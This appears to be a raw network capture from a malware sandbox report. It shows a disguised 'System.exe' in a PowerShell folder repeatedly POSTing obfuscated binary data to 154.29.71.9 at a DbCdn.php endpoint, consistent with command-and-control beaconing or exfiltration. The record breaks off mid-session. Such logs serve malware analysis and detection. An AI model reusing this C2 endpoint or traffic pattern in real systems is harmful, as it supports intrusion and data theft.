                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:40.948993921 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:41.304003000 CET1876OUTData Raw: 59 50 58 5f 5b 59 58 52 5b 59 5a 55 50 59 5b 51 56 55 54 45 52 58 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YPX_[YXR[YZUPY[QVUTERXRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:86%.P)[<+=4$;/3&T"[0!%)>$B23$X."Y ']/
                                                                                                    Jan 4, 2025 14:52:41.469109058 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:41.598834991 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 11 27 29 26 51 32 3e 24 50 2e 2c 03 50 3c 1e 00 0a 2f 2d 2f 02 29 3a 2f 5d 2c 0d 27 13 2a 38 2e 09 3e 0f 3f 57 27 3c 23 05 2b 0c 20 51 03 12 24 02 26 00 31 00 3e 33 0b 5a 2c 3d 28 0b 35 31 34 04 32 04 3d 02 21 5b 22 07 25 11 0f 1c 2a 06 25 51 2c 2d 33 1d 2d 0a 23 0a 3f 3f 23 55 0b 1f 26 0a 24 31 3b 0a 25 28 19 03 29 20 3b 00 28 04 3b 1d 20 14 30 1f 31 00 3e 5a 24 0f 14 0c 26 31 31 16 30 0d 2d 5a 21 2e 23 12 31 10 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"')&Q2>$P.,P</-/):/],'*8.>?W'<#+ Q$&1>3Z,=(5142=!["%*%Q,-3-#??#U&$1;%() ;(; 01>Z$&110-Z!.#1.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    29192.168.2.449770154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:41.463892937 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:41.816831112 CET2600OUTData Raw: 5c 5c 58 5b 5b 5b 5d 57 5b 59 5a 55 50 5a 5b 55 56 56 54 49 52 59 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \\X[[[]W[YZUPZ[UVVTIRYRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,.9Z%1>=)-3W$0^83>Q!>'U5^&(><E%49"Y ']/,
                                                                                                    Jan 4, 2025 14:52:42.010025978 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:42.147977114 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    30192.168.2.449771154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:42.496752024 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:42.848098040 CET2600OUTData Raw: 59 5a 5d 5f 5e 59 58 56 5b 59 5a 55 50 5a 5b 51 56 50 54 42 52 58 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZ]_^YXV[YZUPZ[QVPTBRXR[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,.2=>=Z)>4'+;/9!+T"^&(-?24\:/"Y ']/,
                                                                                                    Jan 4, 2025 14:52:43.013020039 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:43.142088890 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0
                                                                                                    Jan 4, 2025 14:52:43.359467030 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    31192.168.2.449772154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:43.281759977 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:43.629342079 CET2600OUTData Raw: 5c 5b 5d 5d 5e 59 5d 57 5b 59 5a 55 50 5a 5b 50 56 50 54 42 52 50 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[]]^Y]W[YZUPZ[PVPTBRPRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/>$81)?30;0;%6;V6(>)<A%#9?"Y ']/,
                                                                                                    Jan 4, 2025 14:52:43.799000025 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:43.926270008 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    32192.168.2.449773154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:44.126622915 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:44.474004030 CET2600OUTData Raw: 59 50 58 59 5b 5d 5d 51 5b 59 5a 55 50 5c 5b 53 56 55 54 43 52 5f 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YPXY[]]Q[YZUP\[SVUTCR_R]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8>:%8!>$?3U3',> -+P6%Q)& $X:/"Y ']/4
                                                                                                    Jan 4, 2025 14:52:44.657025099 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:44.830732107 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    33192.168.2.449774154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:44.971976995 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:45.317115068 CET2600OUTData Raw: 5c 5a 5d 5d 5b 54 58 52 5b 59 5a 55 50 5a 5b 51 56 52 54 48 52 58 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Z]][TXR[YZUPZ[QVRTHRXRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8X%18W=$+-38#/&Q5/W#;&=-$A$08-"Y ']/,
                                                                                                    Jan 4, 2025 14:52:45.489480019 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:45.618202925 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    34192.168.2.449775154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:45.746390104 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:46.098968983 CET2600OUTData Raw: 59 58 58 5c 5b 54 58 50 5b 59 5a 55 50 59 5b 5b 56 52 54 48 52 51 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXX\[TXP[YZUPY[[VRTHRQRYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/%28?=<X)=%;X;0=6+#(*>$A13."Y ']/
                                                                                                    Jan 4, 2025 14:52:46.300652981 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:46.435178995 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    35192.168.2.449776154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:46.626442909 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1864
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    36192.168.2.449777154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:46.900643110 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:47.254369974 CET2600OUTData Raw: 59 5d 58 51 5b 5f 58 5c 5b 59 5a 55 50 5d 5b 54 56 5c 54 41 52 5f 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y]XQ[_X\[YZUP][TV\TAR_RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,5^2^9=#(7W' ;="-!;)W>/23:?"Y ']/0
                                                                                                    Jan 4, 2025 14:52:47.424838066 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:47.560080051 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    37192.168.2.449778154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:47.697371006 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:48.051289082 CET2600OUTData Raw: 59 58 58 59 5e 58 5d 56 5b 59 5a 55 50 51 5b 55 56 5d 54 40 52 5e 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXXY^X]V[YZUPQ[UV]T@R^RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9;.Z1;%=.4(=$+/.#*6/#8V)>/1<./"Y ']/
                                                                                                    Jan 4, 2025 14:52:48.242548943 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:48.375917912 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    38192.168.2.449779154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:48.513093948 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:48.864162922 CET2600OUTData Raw: 59 5e 58 5d 5e 5f 58 50 5b 59 5a 55 50 5a 5b 56 56 52 54 41 52 5b 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y^X]^_XP[YZUPZ[VVRTAR[RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,.528!=>(+=0;#8>P -0!=T>X+204:/"Y ']/,
                                                                                                    Jan 4, 2025 14:52:49.045989990 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:49.177603960 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    39192.168.2.449780154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:49.520817995 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:49.879355907 CET2600OUTData Raw: 59 5c 5d 5b 5b 5b 5d 57 5b 59 5a 55 50 5a 5b 51 56 51 54 44 52 5e 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\][[[]W[YZUPZ[QVQTDR^RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,>5Z%&?-$('U'+8Z/#%!'";=Q*/%U<Y-"Y ']/,
                                                                                                    Jan 4, 2025 14:52:50.065375090 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:50.330246925 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0
                                                                                                    Jan 4, 2025 14:52:50.330285072 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    40192.168.2.449781154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:50.463970900 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
